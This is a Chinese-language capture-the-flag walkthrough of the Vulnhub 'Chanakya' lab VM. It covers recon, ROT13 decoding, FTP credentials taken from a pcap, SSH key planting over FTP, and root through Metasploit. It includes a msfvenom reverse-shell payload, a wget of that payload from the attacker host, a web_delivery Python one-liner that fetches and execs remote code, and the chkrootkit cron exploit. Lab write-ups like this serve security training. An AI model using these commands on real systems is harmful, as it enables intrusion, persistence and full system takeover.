Vulnhub之Chanakya靶机详细测试过程
Chanakya
识别目标主机IP地址
(root💀kali)-[~/Vulnhub/chanakya]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.137 00:0c:29:b9:eb:f5 1 60 VMware, Inc.
192.168.187.254 00:50:56:ef:2f:9e 1 60 VMware, Inc.
利用Kali Linux自带的Netdiscover工具识别目标主机IP地址为192.168。187.137
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# nmap -sS -sV -sC -p- 192.168.187.137 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 22:37 EST
Nmap scan report for bogon (192.168.187.137)
Host is up (0.00071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.0.0 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.187.137:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fd:4b:52:55:c2:41:5f:51:a4:5d:90:5b:be:17:0d:13 (RSA)
| 256 f1:98:34:0a:43:97:6d:c7:e0:78:d3:23:e0:4e:18:11 (ECDSA)
|_ 256 9d:eb:79:af:59:c0:bb:c2:4a:e3:00:7c:05:62:48:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Chanakya
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:B9:EB:F5 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
获得Shell
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): anonymous
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# searchsploit pyftpdlib
Exploits: No Results
Shellcodes: No Results
-
目标FTP不允许匿名访问
-
FTP服务不存在可利用的漏洞
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# nikto -h http://192.168.187.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.137
+ Target Hostname: 192.168.187.137
+ Target Port: 80
+ Start Time: 2023-02-12 22:44:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 94e, size: 596965271be00, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-02-12 22:45:17 (GMT-5) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# gobuster dir -u http://192.168.187.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2023/02/12 22:46:21 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 319] [--> http://192.168.187.137/images/]
/index.html (Status: 200) [Size: 2382]
/assets (Status: 301) [Size: 319] [--> http://192.168.187.137/assets/]
/personal.html (Status: 200) [Size: 1175]
/work.html (Status: 200) [Size: 1400]
/facts.html (Status: 200) [Size: 899]
/abuse.txt (Status: 200) [Size: 14]
/legacy.html (Status: 200) [Size: 1423]
/child.html (Status: 200) [Size: 1508]
/major.html (Status: 200) [Size: 1243]
/late.html (Status: 200) [Size: 3214]
/server-status (Status: 403) [Size: 280]
===============================================================
2023/02/12 22:49:00 Finished
===============================================================
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# curl http://192.168.187.137/abuse.txt
nfubxn.cpncat
会是域名吗,试一下再说
看一下有无子域名
──(root💀kali)-[~/Vulnhub/chanakya]
└─# wfuzz -u http://nfubxn.cpncat -H "Host:FUZZ.nfubxn.cpncat" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 161
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://nfubxn.cpncat/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000689: 400 12 L 53 W 422 Ch "gc._msdcs"
000010581: 400 12 L 53 W 422 Ch "#mail"
000009532: 400 12 L 53 W 422 Ch "#www"
000019834: 400 12 L 53 W 422 Ch "_domainkey"
000042729: 400 12 L 53 W 422 Ch "mailing._domainkey.sunnynews"
000042737: 400 12 L 53 W 422 Ch "mailing._domainkey.info"
000047706: 400 12 L 53 W 422 Ch "#smtp"
000048726: 400 12 L 53 W 422 Ch "hallam_dev"
000048728: 400 12 L 53 W 422 Ch "hallam_ad"
000052040: 400 12 L 53 W 422 Ch "wm_j_b__ruffin"
000075231: 400 12 L 53 W 422 Ch "2609_n_www"
000075235: 400 12 L 53 W 422 Ch "0907_n_hn.m"
000088990: 400 12 L 53 W 422 Ch "faitspare_mbp.cit"
000091135: 400 12 L 53 W 422 Ch "sb_0601388345bc450b"
000091134: 400 12 L 53 W 422 Ch "sb_0601388345bc6cd8"
000103135: 400 12 L 53 W 422 Ch "#pop3"
000104844: 400 12 L 53 W 422 Ch "api_web_dev"
000104922: 400 12 L 53 W 422 Ch "api_webi_dev"
000104819: 400 12 L 53 W 422 Ch "api_portal_dev"
000112922: 400 12 L 53 W 422 Ch "sklep_test"
000075253: 400 12 L 53 W 422 Ch "0507_n_hn"
Total time: 130.0142
Processed Requests: 114441
Filtered Requests: 114420
Requests/sec.: 880.2185
并没有爆破出子域名,是不是这个方向有误?
查看其他人的解法,nfubxn.cpncat不是域名,而是rot13编码后的信息
解码后得到:ashoka.pcapng(用cyberchef网站)
利用wireshark分析文件,得知ftp用户名和密码为:
ashoka: kautilya
利用上述信息登录ftp
──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> pwd
257 "/" is the current directory.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 ashoka ashoka 1 Nov 05 2019 .bash_history
-rw-r--r-- 1 ashoka ashoka 220 Nov 05 2019 .bash_logout
-rw-r--r-- 1 ashoka ashoka 3771 Nov 05 2019 .bashrc
drwx------ 2 ashoka ashoka 4096 Nov 05 2019 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 2019 .local
-rw-r--r-- 1 ashoka ashoka 807 Nov 05 2019 .profile
226 Transfer complete.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1 bytes received in 0.00 secs (1.6195 kB/s)
ftp> cd /var
550 No such file or directory.
ftp> put test.txt
local: test.txt remote: test.txt
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
12 bytes sent in 0.00 secs (113.7743 kB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 ashoka ashoka 1 Nov 05 2019 .bash_history
-rw-r--r-- 1 ashoka ashoka 220 Nov 05 2019 .bash_logout
-rw-r--r-- 1 ashoka ashoka 3771 Nov 05 2019 .bashrc
drwx------ 2 ashoka ashoka 4096 Nov 05 2019 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 2019 .local
-rw-r--r-- 1 ashoka ashoka 807 Nov 05 2019 .profile
-rw-r--r-- 1 root root 12 Feb 13 04:09 test.txt
226 Transfer complete.
ftp>
可以上传文件,接下来可以将公钥上传至目标服务器
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:o3qqxP2XtfrtTqjSSy4k1Ikh5+xRym+dW4MT2aWLHqo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| . o . . |
| * * . o o |
| O o o o |
| o o .S= . |
| . .o +.B.=. |
| o .+.+.B.o. |
| . o=o*..o |
| ..E+.+=+.o+ |
+----[SHA256]-----+
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root 1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root 12 Feb 12 23:09 test.txt
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root 1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root 12 Feb 12 23:09 test.txt
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# cp ~/root/.ssh/id_rsa.pub .
cp: cannot stat '/root/root/.ssh/id_rsa.pub': No such file or directory
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# cd ~/ 1 ⨯
┌──(root💀kali)-[~]
└─# ls
Desktop Downloads geckodriver Music Network_Services Public Templates tryhackme Vulnhub
Documents dvwa go NetfilterQueue-1.0.0 Pictures starting_point_jasonhuawen.ovpn Toolsets Videos
┌──(root💀kali)-[~]
└─# cd .ssh
┌──(root💀kali)-[~/.ssh]
└─# ls -alh
total 4.4M
drwx------ 2 root root 4.0K Feb 12 23:11 .
drwx------ 42 root root 4.0K Feb 12 23:08 ..
-rw------- 1 root root 2.6K Feb 12 23:11 id_rsa
-rw-r--r-- 1 root root 563 Feb 12 23:11 id_rsa.pub
-rw------- 1 root root 2.2M Feb 12 21:28 known_hosts
-rw------- 1 root root 2.2M Jun 24 2022 known_hosts.old
┌──(root💀kali)-[~/.ssh]
└─# cp id_rsa.pub ~/Vulnhub/chanakya
┌──(root💀kali)-[~/.ssh]
└─# cp id_rsa ~/Vulnhub/chanakya
┌──(root💀kali)-[~/.ssh]
└─# cd ~/Vulnhub/chanakya
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 128K
drwxr-xr-x 2 root root 4.0K Feb 12 23:12 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root 1 Feb 12 23:08 .bash_history
-rw------- 1 root root 2.6K Feb 12 23:12 id_rsa
-rw-r--r-- 1 root root 563 Feb 12 23:12 id_rsa.pub
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root 12 Feb 12 23:09 test.txt
──(root💀kali)-[~/Vulnhub/chanakya]
└─# ftp 192.168.187.137
Connected to 192.168.187.137.
220 pyftpdlib based ftpd ready.
Name (192.168.187.137:root): ashoka
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 Active data connection established.
550 No such file or directory.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 ashoka ashoka 1 Nov 05 2019 .bash_history
-rw-r--r-- 1 ashoka ashoka 220 Nov 05 2019 .bash_logout
-rw-r--r-- 1 ashoka ashoka 3771 Nov 05 2019 .bashrc
drwx------ 2 ashoka ashoka 4096 Nov 05 2019 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 2019 .local
-rw-r--r-- 1 ashoka ashoka 807 Nov 05 2019 .profile
-rw-r--r-- 1 root root 12 Feb 13 04:09 test.txt
226 Transfer complete.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (8.3894 MB/s)
ftp>
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh -i id_rsa ashoka@192.168.187.137
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Tue Nov 5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
ashoka@ubuntu:~$
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.187.130 LPORT=9999 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls
ashoka.pcapng chanakya-web id_rsa linpeas.sh shell.elf
authorized_keys cha.zip id_rsa.pub nmap_full_scan test.txt
将elf文件下载到靶机:
ashoka@ubuntu:/var$ cd /tmp
ashoka@ubuntu:/tmp$ wget http://192.168.187.130:8000/shell.elf
--2023-02-12 21:13:45-- http://192.168.187.130:8000/shell.elf
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘shell.elf’
shell.elf 100%[=============================================>] 207 --.-KB/s in 0s
2023-02-12 21:13:45 (40.1 MB/s) - ‘shell.elf’ saved [207/207]
ashoka@ubuntu:/tmp$ chmod 777 shell.elf
ashoka@ubuntu:/tmp$
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.187.130:9999
在靶机上运行shell.elf,这样在Kali Linux上得到meterpreter session
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.187.137 - Collecting local exploits for x86/linux...
[*] 192.168.187.137 - 39 exploit checks are being tried...
[+] 192.168.187.137 - exploit/linux/local/su_login: The target appears to be vulnerable.
meterpreter > use exploit/linux/local/su_login
Loading extension exploit/linux/local/su_login...
[-] Failed to load extension: i486-linux-musl/exploit/linux/local/su_login not found
meterpreter >
执行失败!
msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address
on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(multi/script/web_delivery) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/script/web_delivery) > set SRVHOST 192.168.187.130
SRVHOST => 192.168.187.130
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.187.130:6666
[*] Using URL: http://192.168.187.130:8080/J3YaKcgcgMv
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.187.130:8080/J3YaKcgcgMv', context=ssl._create_unverified_context());exec(r.read());"
msf6 exploit(multi/script/web_delivery) > [*] 192.168.187.137 - Meterpreter session 1 closed. Reason: Died
[*] 192.168.187.137 web_delivery - Delivering Payload (501 bytes)
[*] Sending stage (39704 bytes) to 192.168.187.137
[*] Meterpreter session 2 opened (192.168.187.130:6666 -> 192.168.187.137:59598 ) at 2023-02-13 00:23:41 -0500
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter python/linux ashoka @ ubuntu 192.168.187.130:6666 -> 192.168.187.137:59598 (192.168.18
7.137)
msf6 exploit(multi/script/web_delivery) > get
get getg
msf6 exploit(multi/script/web_delivery) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)
msf6 exploit(multi/script/web_delivery) > shell
[-] Unknown command: shell
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter python/linux ashoka @ ubuntu 192.168.187.130:6666 -> 192.168.187.137:59598 (192.168.18
7.137)
msf6 exploit(multi/script/web_delivery) > sessions 2
[*] Starting interaction with 2...
meterpreter > shell
Process 123831 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
$ id
id
uid=1001(ashoka) gid=1001(ashoka) groups=1001(ashoka)
$ exit
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/script/web_delivery) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)
msf6 exploit(multi/script/web_delivery) > pwd
[*] exec: pwd
/root/Vulnhub/chanakya
msf6 exploit(multi/script/web_delivery) >
仍然是普通用户
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter python/linux ashoka @ ubuntu 192.168.187.130:6666 -> 192.168.187.137:59598 (192.168.18
7.137)
msf6 exploit(multi/script/web_delivery) > use exploit/unix/local/chkrootkit
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.176.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/local/chkrootkit) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(unix/local/chkrootkit) > set LPORT 7777
LPORT => 7777
msf6 exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf6 exploit(unix/local/chkrootkit) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Started reverse TCP handler on 192.168.187.130:7777
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[+] Deleted /tmp/update
[*] Command shell session 3 opened (192.168.187.130:7777 -> 192.168.187.137:46062 ) at 2023-02-13 00:27:07 -0500
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 24K
drwx------ 3 root root 4.0K Nov 5 2019 .
drwxr-xr-x 22 root root 4.0K Nov 5 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 408 Nov 5 2019 final.txt
drwxr-xr-x 3 root root 4.0K Nov 5 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
cat final.txt
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
成功提权,并拿到root flag
经验教训
-
本靶机第一个关键点是nfubxn.cpncat的解读,其实看上去确实不像域名,这个时候可以考虑ROT13编码
-
当可以通过FTP可以上传文件的时候,此时需要想到可以将ssh的公钥上传
-
本靶机练习了metasploit的post模块,用于提权。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
